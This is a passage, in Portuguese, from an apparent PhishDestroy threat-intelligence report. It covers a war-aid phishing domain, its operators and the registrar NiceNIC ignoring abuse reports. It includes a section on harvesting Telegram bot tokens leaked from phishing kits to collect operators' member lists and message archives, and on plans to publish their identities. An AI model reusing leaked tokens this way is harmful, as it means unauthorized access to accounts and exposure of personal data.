Observe o comentário revelador de Bonya: "Também fomos atacados pelo bot ucraniano" — confirmando que ambos os projetos (ucraniano e indonésio) contam com a mesma equipe de operadores e que essa não foi a primeira vez que sua infraestrutura foi comprometida.

Seção 8: O que isso demonstra

Como funciona o PhishDestroy

Todos os domínios que aparecem em phishdestroy.io passa por esse Pipeline automatizado. O dopomogvoina[.]sbs não foi exceção.

Detecção
Análise estática
Mapeamento de infraestrutura
Descoberta da Origem
OSINT
Geração de relatórios

Cronograma da investigação

20 de março de 2026
Domínio dopomogvoina[.]sbs registrado pela NiceNIC International
21 de março de 2026
Detectado pelo Pipeline de monitoramento automatizado do PhishDestroy
21 de março de 2026
Análise totalmente automatizada concluída: infraestrutura mapeada, pacote JS desofuscado, protocolo WebSocket documentado
22 de março de 2026
IP de origem identificado. Segundo projeto de phishing (“HealthCare ID”) descoberto no mesmo servidor
22 de março de 2026
Exposto config.json permite a identificação do operador por meio da API do Telegram Bot
23 de março de 2026
Denúncias de abuso encaminhadas ao provedor de hospedagem, à Cloudflare e aos CERTs competentes
25 de março de 2026
Artigo publicado. Relatórios de domínios já estão disponíveis no PhishDestroy

Como isso foi possível: a rede de inteligência de bots do PhishDestroy

Esta investigação foi conduzida inteiramente por sistemas automatizados. O Pipeline do PhishDestroy não se limita a detectar domínios de phishing — ele se infiltra na infraestrutura dos operadores por trás deles.

2,000+
Bots do Telegram coletados
Ativo
Alguns bots ainda são monitorados
Desde 2024
Cobrança em andamento

Quando kits de phishing expõem tokens de bots do Telegram — como aconteceu com este, por meio de config.json — nosso sistema as coleta automaticamente, mapeia grupos de operadores, extrai listas de membros e arquiva históricos de mensagens. Mais de 2.000 bots são coletados dessa forma desde 2024. Alguns ainda estão ativos, e gostamos de observar os criminosos agindo em tempo real — porque o desfecho já está escrito.

Mesmo os usuários que excluem suas contas ou apagam seus grupos já estão atrasados. Quando entram em pânico, já temos tudo — arquivos de mensagens, dados de perfil, participações em grupos, bots conectados. A exclusão não muda nada. Os dados já existiam e agora estão em nosso banco de dados.

"Espere por mim" — Edição dos Golpistas

Esse caso não é único — é um exemplo de negligência sistemática por parte da NiceNIC que decidimos apresentar como exemplo de “mega-hackers”. Como “Типичный Мошенник” corretamente observou: há uma diferença entre hackers e golpistas — inteligência. Esses operadores não são nem hackers nem pessoas inteligentes.

Os sistemas da PhishDestroy coletam automaticamente evidências como essa em milhares de domínios — rastreando bots, arquivando comunicações dos operadores e mapeando a infraestrutura. Esse caso específico era simplesmente absurdo demais para não ser divulgado. O kit de phishing é de nível básico, a segurança operacional (OPSEC) é inexistente e os operadores, em pânico, excluiram seu grupo poucos minutos após a descoberta.

Estamos desenvolvendo um sistema que exibirá identidades verificadas dos operadores diretamente nas páginas de relatórios de domínio — de golpista a vítima, como no programa de TV russo “Жди Меня” (Espere por mim), mas ao contrário. Ele vem funcionando em modo fechado desde 2024. Muitos operadores já foram identificados — inclusive aqueles que excluiram suas contas. Estamos apenas decidindo quais são os mais interessante maneira de apresentar isso. Fiquem ligados.

Domínios relacionados

Nossa análise identificou um segundo domínio — hlpforvpeople[.]sbs — registrados pelo mesmo registrador, com padrões de infraestrutura idênticos. Ambos os domínios estão registrados em nosso banco de dados:

Não conformidade do registrador: NiceNIC International

A NiceNIC International Group Co., Limited (Hong Kong) recebeu vários relatos detalhados de abuso do PhishDestroy sobre ambos dopomogvoina[.]sbs e hlpforvpeople[.]sbs. No momento da publicação — 5 dias após o primeiro relatório — nenhuma medida foi tomada. Ambos os domínios continuam em pleno funcionamento.

Este não é um caso isolado. O NiceNIC é um problema recorrente em nossas investigações. O contato para denúncias de abuso do registrador (abuse@nicenic.net) sistematicamente deixa de responder a denúncias de phishing repletas de evidências. Apesar de ser um registrador credenciado pela ICANN e sujeito ao Acordo de Credenciamento de Registradores (RAA §3.18), a NiceNIC opera com aparente impunidade.

NiceNIC mantém uma presença em russo e comercializa .ru domínios a preços elevados (~US$ 200) e se comunica com os clientes por meio do VK e do Telegram — plataformas populares entre o público de língua russa. O fato de sua base de clientes se sobrepor à de comunidades clandestinas levanta sérias dúvidas sobre se a falta de resposta do registrador às denúncias de abuso é negligência ou uma estratégia comercial deliberada.

Esta investigação foi publicada parcialmente devido à inércia prolongada da NiceNIC. Quando os registradores se recusam a tomar medidas contra abusos relacionados a phishing, a exposição pública passa a ser o único mecanismo de prestação de contas restante.

Principais conclusões

  • A automação é a única maneira de acompanhar o ritmo. Os kits de phishing são implantados e transformados em armas em questão de horas. A análise manual não consegue acompanhar esse ritmo.
  • Os operadores cometem erros. Um arquivo de configuração exposto em um projeto secundário levou à descoberta de toda uma operação multinacional de phishing. É difícil manter uma OPSEC perfeita em todos os projetos.
  • A engenharia social evolui acompanhando o ciclo de notícias. A guerra, a ajuda humanitária e os programas governamentais são cada vez mais explorados como iscas de phishing, pois têm como alvo pessoas em situação de angústia, que tendem a questionar menos a legitimidade dessas iniciativas.
  • A reutilização de infraestrutura é a regra. Um servidor, dois projetos de phishing, dois países, os mesmos operadores. Mapear as conexões da infraestrutura revela muito mais do que analisar um único domínio isoladamente.

Pesquisas relacionadas

Mais investigações provenientes do Pipeline de inteligência automatizado do PhishDestroy

Painel do TrustWallet foi exposto
Violação no painel de administração revela operação de phishing envolvendo criptomoedas em vários países, com registros de bate-papo dos operadores.
Redes de roubo de criptomoedas expostas
Mapeando a infraestrutura por trás dos kits de phishing que esvaziam carteiras e têm como alvo usuários de DeFi.
NiceNIC: Registrador que facilita o crime cibernético
Como um registrador credenciado pela ICANN ignora sistematicamente denúncias de abuso — inclusive no âmbito desta investigação.
XMRWallet exposta: 10 anos de chaves roubadas
Um esquema envolvendo carteiras de Monero, que durou uma década, foi desmascarado por meio de análise de JavaScript e investigação forense de domínios.
Infraestrutura de golpes é desmascarada
Hospedagem compartilhada, operadores compartilhados — como as redes de phishing reutilizam a infraestrutura em diferentes campanhas.
BuyTRX Drainer: A Verdade Revelada
Golpe envolvendo energia baseado na rede TRON que esvazia carteiras por meio de aprovações maliciosas de contratos inteligentes.

Aviso legal: Esta investigação foi conduzida inteiramente por meio de reconhecimento passivo e APIs públicas. Não foi realizado nenhum acesso não autorizado a nenhum sistema. As chamadas à API do Telegram Bot utilizaram um token que foi exposto publicamente pelos operadores em um endpoint não autenticado. Todos os nomes de domínio neste artigo tiveram suas identidades ocultadas, de acordo com a convenção padrão de segurança da informação.

Compartilhe esta investigação

X / Twitter Telegram Reddit LinkedIn

Investigações relacionadas

Anatomia do phishing de criptomoedas: análise de 8 programas reais de roubo de frases-semente
INVESTIGAÇÃO APROFUNDADA
Anatomia do phishing de criptomoedas: análise de 8 programas reais de roubo de frases-semente
Golpistas desmascarados: análise detalhada de quatro sistemas de back-end usados em golpes
INVESTIGAÇÃO
Golpistas desmascarados: análise detalhada de quatro sistemas de back-end usados em golpes
$0 Takedowns: How We Disrupt Phishing Infrastructure
INVESTIGAÇÃO
$0 Takedowns: How We Disrupt Phishing Infrastructure